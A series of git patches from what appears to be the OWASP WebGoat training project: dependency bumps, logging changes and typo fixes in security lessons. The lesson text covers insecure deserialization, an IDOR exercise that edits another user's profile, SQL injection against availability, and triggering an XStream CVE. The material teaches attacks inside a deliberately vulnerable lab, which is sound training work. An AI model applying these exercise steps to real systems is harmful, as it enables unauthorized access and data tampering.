+++ b/.github/workflows/release.yml
@@ -25,7 +25,7 @@ jobs:
           architecture: x64
 
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.5
+        uses: actions/cache@v3.0.6
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index 8a5859d11..ed7437748 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -40,7 +40,7 @@ jobs:
                   architecture: x64
             #Uses an action to set up a cache using a certain key based on the hash of the dependencies
             - name: Cache Maven packages
-              uses: actions/cache@v3.0.5
+              uses: actions/cache@v3.0.6
               with:
                   path: ~/.m2
                   key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}

From 975cbf5769c000163c5ac3585267f6c4a64efaa8 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Mon, 8 Aug 2022 20:06:48 +0200
Subject: [PATCH 196/227] Bump docker/build-push-action from 3.1.0 to 3.1.1
 (#1321)

Bumps [docker/build-push-action](https://github.com/docker/build-push-action) from 3.1.0 to 3.1.1.
- [Release notes](https://github.com/docker/build-push-action/releases)
- [Commits](https://github.com/docker/build-push-action/compare/v3.1.0...v3.1.1)

---
updated-dependencies:
- dependency-name: docker/build-push-action
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/release.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 34edf11d8..ae23428e3 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -88,7 +88,7 @@ jobs:
           password: ${{ secrets.DOCKERHUB_TOKEN }}
 
       - name: "Build and push"
-        uses: docker/build-push-action@v3.1.0
+        uses: docker/build-push-action@v3.1.1
         with:
           context: ./
           file: ./Dockerfile

From de3c2c8d85b18d6b0dbb7519d6af4e9492442f2f Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Mon, 22 Aug 2022 09:10:47 +0000
Subject: [PATCH 197/227] Bump actions/cache from 3.0.6 to 3.0.8

Bumps [actions/cache](https://github.com/actions/cache) from 3.0.6 to 3.0.8.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v3.0.6...v3.0.8)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 .github/workflows/build.yml   | 4 ++--
 .github/workflows/release.yml | 2 +-
 .github/workflows/test.yml    | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index e1d98dc81..5790fb518 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -42,7 +42,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.6
+        uses: actions/cache@v3.0.8
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
@@ -63,7 +63,7 @@ jobs:
               java-version: 17
               architecture: x64
         - name: Cache Maven packages
-          uses: actions/cache@v3.0.6
+          uses: actions/cache@v3.0.8
           with:
               path: ~/.m2
               key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index ae23428e3..85d34beda 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -25,7 +25,7 @@ jobs:
           architecture: x64
 
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.6
+        uses: actions/cache@v3.0.8
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index ed7437748..7dc5e492f 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -40,7 +40,7 @@ jobs:
                   architecture: x64
             #Uses an action to set up a cache using a certain key based on the hash of the dependencies
             - name: Cache Maven packages
-              uses: actions/cache@v3.0.6
+              uses: actions/cache@v3.0.8
               with:
                   path: ~/.m2
                   key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}

From f5e4d4717a57d563f3c562af3d6d04714fcb9891 Mon Sep 17 00:00:00 2001
From: Thanh Tran <thanh@Thanhs-MacBook-Pro.local>
Date: Mon, 29 Aug 2022 17:13:34 +1000
Subject: [PATCH 198/227] FixTypo - Fix typo in various lesson documentations

---
 .../lessons/cryptography/documentation/encoding_plan.adoc     | 2 +-
 .../lessons/cryptography/documentation/keystores.adoc         | 4 ++--
 .../lessons/cryptography/documentation/postquantum.adoc       | 2 +-
 .../resources/lessons/csrf/documentation/CSRF_Frameworks.adoc | 2 +-
 .../documentation/InsecureDeserialization_GadgetChain.adoc    | 2 +-
 .../documentation/InsecureDeserialization_SimpleExploit.adoc  | 2 +-
 .../documentation/InsecureDeserialization_Task.adoc           | 2 +-
 .../lessons/idor/documentation/IDOR_editOtherProfile.adoc     | 2 +-
 src/main/resources/lessons/idor/documentation/temp.txt        | 2 +-
 .../resources/lessons/jwt/documentation/JWT_structure.adoc    | 2 +-
 .../lessontemplate/documentation/lesson-template-attack.adoc  | 2 +-
 .../passwordreset/documentation/PasswordReset_mitigation.adoc | 2 +-
 .../documentation/SqlInjection_introduction_content10.adoc    | 2 +-
 13 files changed, 14 insertions(+), 14 deletions(-)

diff --git a/src/main/resources/lessons/cryptography/documentation/encoding_plan.adoc b/src/main/resources/lessons/cryptography/documentation/encoding_plan.adoc
index a67953041..a606f3853 100644
--- a/src/main/resources/lessons/cryptography/documentation/encoding_plan.adoc
+++ b/src/main/resources/lessons/cryptography/documentation/encoding_plan.adoc
@@ -2,7 +2,7 @@
  
 == Base64 Encoding 
 
-Encoding is not realy cryptography, but it is used a lot in all kinds of standards around cryptographic functions. Especially Base64 encoding. 
+Encoding is not really cryptography, but it is used a lot in all kinds of standards around cryptographic functions. Especially Base64 encoding. 
 
 Base64 encoding is a technique used to transform all kinds of bytes to a specific range of bytes. This specific range is the ASCII readable bytes.
 This way you can transfer binary data such as secret or private keys more easily. You could even print these out or write them down.
diff --git a/src/main/resources/lessons/cryptography/documentation/keystores.adoc b/src/main/resources/lessons/cryptography/documentation/keystores.adoc
index 2f057b36f..6ce4a79e1 100644
--- a/src/main/resources/lessons/cryptography/documentation/keystores.adoc
+++ b/src/main/resources/lessons/cryptography/documentation/keystores.adoc
@@ -21,8 +21,8 @@ Some certificate authorities that are used to provide you with a server certific
 
 == Managed keystores in operating system, browser and other applications
 
-When you visit a website and your browser says that the certificates are fine, it means that the certificate used for the website is issued by a trusted certificate authority. But this list of trusted certificate authorites is managed. Some CA's might be revoked or removed. These updates happen in the background when browser updates are installed. 
-Not only the browser maitains a list of trusted certificate authorities, the operation system does so as well. And the Java runtime also has its own list which is kept in the cacerts file. Updates of the OS and Java JRE keep this list up to date. In coporate environments, these are usually maintained by the company and also contain company root certificates.
+When you visit a website and your browser says that the certificates are fine, it means that the certificate used for the website is issued by a trusted certificate authority. But this list of trusted certificate authorities is managed. Some CA's might be revoked or removed. These updates happen in the background when browser updates are installed. 
+Not only the browser maintains a list of trusted certificate authorities, the operation system does so as well. And the Java runtime also has its own list which is kept in the cacerts file. Updates of the OS and Java JRE keep this list up to date. In corporate environments, these are usually maintained by the company and also contain company root certificates.
 
 == Extra check for website certificates using DNS CAA records
 
diff --git a/src/main/resources/lessons/cryptography/documentation/postquantum.adoc b/src/main/resources/lessons/cryptography/documentation/postquantum.adoc
index 7294575cb..3b8666c30 100644
--- a/src/main/resources/lessons/cryptography/documentation/postquantum.adoc
+++ b/src/main/resources/lessons/cryptography/documentation/postquantum.adoc
@@ -2,6 +2,6 @@
 
 == Post quantum cryptography
 
-Quantum computers are here and getting more power in available qubits each year. Quantum computers are and will be capable of decrypting information that was encrypted with algorithms that were thought to be safe. For some years now, a lot of encrypted communicatation using quantum vulnerable cryptoraphy is being recorded. This information will be decrypted when the quantum computers are powerful enough. Even though the information may be old, it still could contain valuable information that can be misused. Besides the fact that some private information will be known to parties it was not intended for.
+Quantum computers are here and getting more power in available qubits each year. Quantum computers are and will be capable of decrypting information that was encrypted with algorithms that were thought to be safe. For some years now, a lot of encrypted communication using quantum vulnerable cryptography is being recorded. This information will be decrypted when the quantum computers are powerful enough. Even though the information may be old, it still could contain valuable information that can be misused. Besides the fact that some private information will be known to parties it was not intended for.
 
 Mathematics has answers for the post quantum era. New cryptography is already available and should be used NOW in order to minimize threats. You can read more on this on Wikipedia: https://en.wikipedia.org/wiki/Post-quantum_cryptography[Post quatum on Wikipedia,window=_blank]
diff --git a/src/main/resources/lessons/csrf/documentation/CSRF_Frameworks.adoc b/src/main/resources/lessons/csrf/documentation/CSRF_Frameworks.adoc
index 10424aa89..0a2b95255 100644
--- a/src/main/resources/lessons/csrf/documentation/CSRF_Frameworks.adoc
+++ b/src/main/resources/lessons/csrf/documentation/CSRF_Frameworks.adoc
@@ -18,7 +18,7 @@ Remember the session cookie should always be defined with http-only flag.
 Another defense can be to add a custom request header to each call. This will work if all the interactions
 with the server are performed with JavaScript. On the server side you only need to check the presence of this header
 if this header is not present deny the request.
-Some frameworks offer this implementation by default however researcer Alex Infuhr found out that this can be bypassed
+Some frameworks offer this implementation by default however researcher Alex Infuhr found out that this can be bypassed
 as well. You can read about: https://insert-script.blogspot.com/2018/05/adobe-reader-pdf-client-side-request.html[Adobe Reader PDF - Client Side Request Injection]
 
 
diff --git a/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_GadgetChain.adoc b/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_GadgetChain.adoc
index f5c5363d3..438961c11 100644
--- a/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_GadgetChain.adoc
+++ b/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_GadgetChain.adoc
@@ -1,5 +1,5 @@
 == What is a Gadgets Chain
 
-It is weird (but it could happen) to find a gadget that runs dangerous actions itself when is deserialized. However, it is much easier to find a gadget that runs action on other gadget when it is deserializaded, and that second gadget runs more actions on a third gadget, and so on until a real dangerous action is triggered. That set of gadgets that can be used in a deserialization process to achieve dangerous actions is called "Gadget Chain".
+It is weird (but it could happen) to find a gadget that runs dangerous actions itself when is deserialized. However, it is much easier to find a gadget that runs action on other gadget when it is deserialized, and that second gadget runs more actions on a third gadget, and so on until a real dangerous action is triggered. That set of gadgets that can be used in a deserialization process to achieve dangerous actions is called "Gadget Chain".
 
 Finding gadgets to build gadget chains is an active topic for security researchers. This kind of research usually requires to spend a big amount of time reading code.
\ No newline at end of file
diff --git a/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_SimpleExploit.adoc b/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_SimpleExploit.adoc
index 45aa89939..744d61872 100644
--- a/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_SimpleExploit.adoc
+++ b/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_SimpleExploit.adoc
@@ -11,7 +11,7 @@ ObjectInputStream ois = new ObjectInputStream(is);
 AcmeObject acme = (AcmeObject)ois.readObject();
 ----
 
-It is expecting an `AcmeObject` object, but it will execute `readObject()` before the casting ocurs.
+It is expecting an `AcmeObject` object, but it will execute `readObject()` before the casting occurs.
 If an attacker finds the proper class implementing dangerous operations in `readObject()`, he could serialize that object and force the vulnerable application to perform those actions.
 
 === Class included in ClassPath
diff --git a/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_Task.adoc b/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_Task.adoc
index 6e65617a7..2f96bde14 100755
--- a/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_Task.adoc
+++ b/src/main/resources/lessons/deserialization/documentation/InsecureDeserialization_Task.adoc
@@ -1,5 +1,5 @@
 === Let's try
-The following input box receives a serialized object (a string) and it deserialzes it.
+The following input box receives a serialized object (a string) and it deserializes it.
 
 ```
 rO0ABXQAVklmIHlvdSBkZXNlcmlhbGl6ZSBtZSBkb3duLCBJIHNoYWxsIGJlY29tZSBtb3JlIHBvd2VyZnVsIHRoYW4geW91IGNhbiBwb3NzaWJseSBpbWFnaW5l
diff --git a/src/main/resources/lessons/idor/documentation/IDOR_editOtherProfile.adoc b/src/main/resources/lessons/idor/documentation/IDOR_editOtherProfile.adoc
index aa9ae94ba..2029e888d 100644
--- a/src/main/resources/lessons/idor/documentation/IDOR_editOtherProfile.adoc
+++ b/src/main/resources/lessons/idor/documentation/IDOR_editOtherProfile.adoc
@@ -4,5 +4,5 @@ Older apps may follow different patterns, but RESTful apps (which is what's goin
 to perform different functions.
 
 Use that knowledge to take the same base request, change its method, path and body (payload) to modify another user's (Buffalo Bill's) profile.
-Change the role to something lower (since higher privilege roles and users are ususally lower numbers). Also change the
+Change the role to something lower (since higher privilege roles and users are usually lower numbers). Also change the
 user's color to 'red'.
\ No newline at end of file
diff --git a/src/main/resources/lessons/idor/documentation/temp.txt b/src/main/resources/lessons/idor/documentation/temp.txt
index 3b4a38c86..f31bdbb50 100644
--- a/src/main/resources/lessons/idor/documentation/temp.txt
+++ b/src/main/resources/lessons/idor/documentation/temp.txt
@@ -1,6 +1,6 @@
 
 
-- Describe how the attack works / should be some outpu
+- Describe how the attack works / should be some output
 
 <p><b>Concept / Topic To Teach:</b> </p>
  This lesson teaches how to perform XML External Entity Attacks.
diff --git a/src/main/resources/lessons/jwt/documentation/JWT_structure.adoc b/src/main/resources/lessons/jwt/documentation/JWT_structure.adoc
index 9cb187f48..a2951f6a6 100644
--- a/src/main/resources/lessons/jwt/documentation/JWT_structure.adoc
+++ b/src/main/resources/lessons/jwt/documentation/JWT_structure.adoc
@@ -11,7 +11,7 @@ The token is base64 encoded and consists of three parts:
  - claims
  - signature
 
-Both header and claims consist are respresented by a JSON object. The header describes the cryptographic operations applied to the JWT and optionally, additional properties of the JWT.
+Both header and claims consist are represented by a JSON object. The header describes the cryptographic operations applied to the JWT and optionally, additional properties of the JWT.
 The claims represent a JSON object whose members are the claims conveyed by the JWT.
 
 
diff --git a/src/main/resources/lessons/lessontemplate/documentation/lesson-template-attack.adoc b/src/main/resources/lessons/lessontemplate/documentation/lesson-template-attack.adoc
index a1244d4f8..2be501c4f 100644
--- a/src/main/resources/lessons/lessontemplate/documentation/lesson-template-attack.adoc
+++ b/src/main/resources/lessons/lessontemplate/documentation/lesson-template-attack.adoc
@@ -22,7 +22,7 @@ public class SampleAttack extends AssignmentEndpoint { // <3>
             //return failed(this).feedback("lesson-template.sample-attack.failure-2").build();
         }
 
-        //overly simple example for success. See other existing lesssons for ways to detect 'success' or 'failure'
+        //overly simple example for success. See other existing lessons for ways to detect 'success' or 'failure'
         if (secretValue.equals(param1)) {
             return success(this) // <7>
                     .output("Custom Output ...if you want, for success")
diff --git a/src/main/resources/lessons/passwordreset/documentation/PasswordReset_mitigation.adoc b/src/main/resources/lessons/passwordreset/documentation/PasswordReset_mitigation.adoc
index 0fd73abab..9dc4fcbb2 100644
--- a/src/main/resources/lessons/passwordreset/documentation/PasswordReset_mitigation.adoc
+++ b/src/main/resources/lessons/passwordreset/documentation/PasswordReset_mitigation.adoc
@@ -18,7 +18,7 @@ For example: If you send a password reset link to a user via e-mail, do not incl
 Password reset tokens allow a user to reset a password without inherently safe information about the verification of the user. Hence they should be safe. It should be hard to guess such a token. The token should also be only valid for a short amount of time and should be invalid after the user successfully reset their password.
 
 === Logging user actions
-Logging alone can't prevent any attacks but it can make it easier to determine that an attack happened and how the attacker tried to bypass security. You can also use logs to determine if an account really got hijacked and if it has to be returned the the rightful user. Actions you can log are: How did the security questions get answered? When did the access to the password reset link happen in comparison to the time the e-amil got sent? Were there failed attempts?
+Logging alone can't prevent any attacks but it can make it easier to determine that an attack happened and how the attacker tried to bypass security. You can also use logs to determine if an account really got hijacked and if it has to be returned the the rightful user. Actions you can log are: How did the security questions get answered? When did the access to the password reset link happen in comparison to the time the e-mail got sent? Were there failed attempts?
 
 === Two factor authentication
 It is always safer to do an authentication process via two or more separate ways on two or more separate devices. If a user wants to reset their password you can ask them to enter verification codes sent to them via SMS, Messenger, or similar. This makes it hard for an attacker to bypass the verification process, because they need physical access to another device.
diff --git a/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content10.adoc b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content10.adoc
index ccab84775..7f16d952d 100644
--- a/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content10.adoc
+++ b/src/main/resources/lessons/sqlinjection/documentation/SqlInjection_introduction_content10.adoc
@@ -4,7 +4,7 @@ After successfully compromising confidentiality and integrity in the previous le
 There are many different ways to violate availability.
 If an account is deleted or its password gets changed, the actual owner cannot access this account anymore.
 Attackers could also try to delete parts of the database, or even drop the whole database, in order to make the data inaccessible. 
-Revoking the access rights of admins or other users is yet another way to compromise availability; this would prevent these users from accessing either specific parts of the database or even the entire database as a whdle.
+Revoking the access rights of admins or other users is yet another way to compromise availability; this would prevent these users from accessing either specific parts of the database or even the entire database as a whole.
 
 === It is your turn!
 Now you are the top earner in your company.

From 34f5b79249c222dd42419e6504dd5397a42ae3b7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ren=C3=A9=20Zubcevic?= <rene@zubcevic.com>
Date: Mon, 12 Sep 2022 09:02:07 +0200
Subject: [PATCH 199/227] isReadable works inside a container, isFile not
 (#1334)

---
 .../AsciiDoctorTemplateResolver.java          | 21 ++++++++++++++-----
 .../webgoat/container/MvcConfiguration.java   |  3 +++
 2 files changed, 19 insertions(+), 5 deletions(-)

diff --git a/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java b/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java
index ebcc83fbe..fddf3e053 100644
--- a/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java
+++ b/src/main/java/org/owasp/webgoat/container/AsciiDoctorTemplateResolver.java
@@ -83,7 +83,7 @@ public class AsciiDoctorTemplateResolver extends FileTemplateResolver {
     @Override
     protected ITemplateResource computeTemplateResource(IEngineConfiguration configuration, String ownerTemplate, String template, String resourceName, String characterEncoding, Map<String, Object> templateResolutionAttributes) {
         var templateName = resourceName.substring(PREFIX.length());
-
+        log.debug("template used: {}", templateName);
         try (InputStream is = getInputStream(templateName)) {
             JavaExtensionRegistry extensionRegistry = asciidoctor.javaExtensionRegistry();
             extensionRegistry.inlineMacro("webWolfLink", WebWolfMacro.class);
@@ -102,18 +102,26 @@ public class AsciiDoctorTemplateResolver extends FileTemplateResolver {
     }
 
     private InputStream getInputStream(String templateName) throws IOException {
-        if (resourceLoader.getResource("classpath:/" + computeResourceName(templateName, language.getLocale().getLanguage())).isFile()) {
-            return resourceLoader.getResource("classpath:/" + computeResourceName(templateName, language.getLocale().getLanguage())).getInputStream();
+        log.debug("locale: {}",language.getLocale().getLanguage());
+        String computedResourceName = computeResourceName(templateName, language.getLocale().getLanguage());
+        if (resourceLoader.getResource("classpath:/" + computedResourceName).isReadable()/*isFile()*/) {
+            log.debug("localized file exists");
+            return resourceLoader.getResource("classpath:/" + computedResourceName).getInputStream();
         } else {
+            log.debug("using english template");
             return resourceLoader.getResource("classpath:/" + templateName).getInputStream();
         }
     }
     private String computeResourceName(String resourceName, String language) {
+        String computedResourceName;
         if (language.equals("en")) {
-            return resourceName;
+            computedResourceName = resourceName;
         } else {
-            return resourceName.replace(".adoc", "_".concat(language).concat(".adoc"));
+            computedResourceName = resourceName.replace(".adoc", "_".concat(language).concat(".adoc"));
         }
+        log.debug("computed local file name: {}", computedResourceName);
+        log.debug("file exists: {}",resourceLoader.getResource("classpath:/"+computedResourceName).isReadable());
+        return computedResourceName;
     }
 
     private Map<String, Object> createAttributes() {
@@ -134,12 +142,15 @@ public class AsciiDoctorTemplateResolver extends FileTemplateResolver {
 
         Locale browserLocale = (Locale) request.getSession().getAttribute(SessionLocaleResolver.LOCALE_SESSION_ATTRIBUTE_NAME);
         if (null != browserLocale) {
+            log.debug("browser locale {}", browserLocale);
             return browserLocale.getLanguage();
         } else {
             String langHeader = request.getHeader(Headers.ACCEPT_LANGUAGE_STRING);
             if (null != langHeader) {
+                log.debug("browser locale {}", langHeader);
                 return langHeader.substring(0,2);
             } else {
+                log.debug("browser default english");
                 return "en";
             }
         }
diff --git a/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java b/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java
index 69641a8e4..ad0851aa9 100644
--- a/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java
+++ b/src/main/java/org/owasp/webgoat/container/MvcConfiguration.java
@@ -32,6 +32,7 @@
 package org.owasp.webgoat.container;
 
 import lombok.RequiredArgsConstructor;
+import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.i18n.Language;
 import org.owasp.webgoat.container.i18n.Messages;
 import org.owasp.webgoat.container.i18n.PluginMessages;
@@ -71,6 +72,7 @@ import java.util.Set;
  */
 @Configuration
 @RequiredArgsConstructor
+@Slf4j
 public class MvcConfiguration implements WebMvcConfigurer {
 
     private static final String UTF8 = "UTF-8";
@@ -146,6 +148,7 @@ public class MvcConfiguration implements WebMvcConfigurer {
      */
     @Bean
     public AsciiDoctorTemplateResolver asciiDoctorTemplateResolver(Language language, ResourceLoader resourceLoader) {
+        log.debug("template locale {}", language);
         AsciiDoctorTemplateResolver resolver = new AsciiDoctorTemplateResolver(language, resourceLoader);
         resolver.setCacheable(false);
         resolver.setOrder(1);

From 96c2595ad00ec50b373c2c820721dcf97b31c89c Mon Sep 17 00:00:00 2001
From: Jesper Hallborg <jesper.hallborg@ericsson.com>
Date: Wed, 21 Sep 2022 14:07:14 +0200
Subject: [PATCH 200/227] Update interface name to exploit

The name is
org.owasp.webgoat.lessons.vulnerablecomponents.Contact
not
org.owasp.webgoat.vulnerablecomponents.Contact
---
 .../documentation/VulnerableComponents_content5a.adoc           | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content5a.adoc b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content5a.adoc
index 60c7e357c..1809cf26b 100644
--- a/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content5a.adoc
+++ b/src/main/resources/lessons/vulnerablecomponents/documentation/VulnerableComponents_content5a.adoc
@@ -13,6 +13,6 @@ WebGoat uses an XML document to add contacts to a contacts database.
 </contact>  
 ----
 
-The java interface that you need for the exercise is: org.owasp.webgoat.vulnerablecomponents.Contact.
+The java interface that you need for the exercise is: org.owasp.webgoat.lessons.vulnerablecomponents.Contact.
 Start by sending the above contact to see what the normal response would be and then read the CVE vulnerability  documentation (search the Internet) and try to trigger the vulnerability.
 For this example, we will let you enter the XML directly versus intercepting the request and modifying the data.  You provide the XML representation of a contact and WebGoat will convert it a Contact object using `XStream.fromXML(xml)`.

From ea892dbcb2ba50323285f5fe1ca3f5cf7679c45f Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 5 Oct 2022 11:24:44 +0200
Subject: [PATCH 201/227] Bump actions/cache from 3.0.8 to 3.0.10 (#1342)

Bumps [actions/cache](https://github.com/actions/cache) from 3.0.8 to 3.0.10.
- [Release notes](https://github.com/actions/cache/releases)
- [Changelog](https://github.com/actions/cache/blob/main/RELEASES.md)
- [Commits](https://github.com/actions/cache/compare/v3.0.8...v3.0.10)

---
updated-dependencies:
- dependency-name: actions/cache
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 .github/workflows/build.yml   | 4 ++--
 .github/workflows/release.yml | 2 +-
 .github/workflows/test.yml    | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 5790fb518..392450b9a 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -42,7 +42,7 @@ jobs:
           java-version: 17
           architecture: x64
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.8
+        uses: actions/cache@v3.0.10
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
@@ -63,7 +63,7 @@ jobs:
               java-version: 17
               architecture: x64
         - name: Cache Maven packages
-          uses: actions/cache@v3.0.8
+          uses: actions/cache@v3.0.10
           with:
               path: ~/.m2
               key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 85d34beda..aca65c4ad 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -25,7 +25,7 @@ jobs:
           architecture: x64
 
       - name: Cache Maven packages
-        uses: actions/cache@v3.0.8
+        uses: actions/cache@v3.0.10
         with:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index 7dc5e492f..147b36a0a 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -40,7 +40,7 @@ jobs:
                   architecture: x64
             #Uses an action to set up a cache using a certain key based on the hash of the dependencies
             - name: Cache Maven packages
-              uses: actions/cache@v3.0.8
+              uses: actions/cache@v3.0.10
               with:
                   path: ~/.m2
                   key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}

From 1f567749bdcf0ddae4c9531ab2ad587ff9090ceb Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Fri, 7 Oct 2022 09:10:17 +0000
Subject: [PATCH 202/227] Bump actions/first-interaction from 1.1.0 to 1.1.1

Bumps [actions/first-interaction](https://github.com/actions/first-interaction) from 1.1.0 to 1.1.1.
- [Release notes](https://github.com/actions/first-interaction/releases)
- [Commits](https://github.com/actions/first-interaction/compare/v1.1.0...v1.1.1)

---
updated-dependencies:
- dependency-name: actions/first-interaction
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 .github/workflows/welcome.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/welcome.yml b/.github/workflows/welcome.yml
index 24c2a27b9..36199c09c 100644
--- a/.github/workflows/welcome.yml
+++ b/.github/workflows/welcome.yml
@@ -10,7 +10,7 @@ jobs:
     if: github.repository == 'WebGoat/WebGoat'
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/first-interaction@v1.1.0
+      - uses: actions/first-interaction@v1.1.1
         with:
           repo-token: ${{ secrets.GITHUB_TOKEN }}
           issue-message: 'Thanks for submitting your first issue, we will have a look as quickly as possible.'

From 8ec69d0a4136f2f36df42dc13976cc882cfbbebf Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 12 Oct 2022 09:28:12 +0000
Subject: [PATCH 203/227] Bump docker/login-action from 2.0.0 to 2.1.0

Bumps [docker/login-action](https://github.com/docker/login-action) from 2.0.0 to 2.1.0.
- [Release notes](https://github.com/docker/login-action/releases)
- [Commits](https://github.com/docker/login-action/compare/v2.0.0...v2.1.0)

---
updated-dependencies:
- dependency-name: docker/login-action
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 .github/workflows/release.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index aca65c4ad..e00495169 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -82,7 +82,7 @@ jobs:
         uses: docker/setup-buildx-action@v2
 
       - name: "Login to dockerhub"
-        uses: docker/login-action@v2.0.0
+        uses: docker/login-action@v2.1.0
         with:
           username: ${{ secrets.DOCKERHUB_USERNAME }}
           password: ${{ secrets.DOCKERHUB_TOKEN }}

From 3bc5309a1cc0bebff58f002ece6f710420f5e948 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 12 Oct 2022 09:28:21 +0000
Subject: [PATCH 204/227] Bump docker/build-push-action from 3.1.1 to 3.2.0

Bumps [docker/build-push-action](https://github.com/docker/build-push-action) from 3.1.1 to 3.2.0.
- [Release notes](https://github.com/docker/build-push-action/releases)
- [Commits](https://github.com/docker/build-push-action/compare/v3.1.1...v3.2.0)

---
updated-dependencies:
- dependency-name: docker/build-push-action
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 .github/workflows/release.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index e00495169..3b75bfedc 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -88,7 +88,7 @@ jobs:
           password: ${{ secrets.DOCKERHUB_TOKEN }}
 
       - name: "Build and push"
-        uses: docker/build-push-action@v3.1.1
+        uses: docker/build-push-action@v3.2.0
         with:
           context: ./
           file: ./Dockerfile

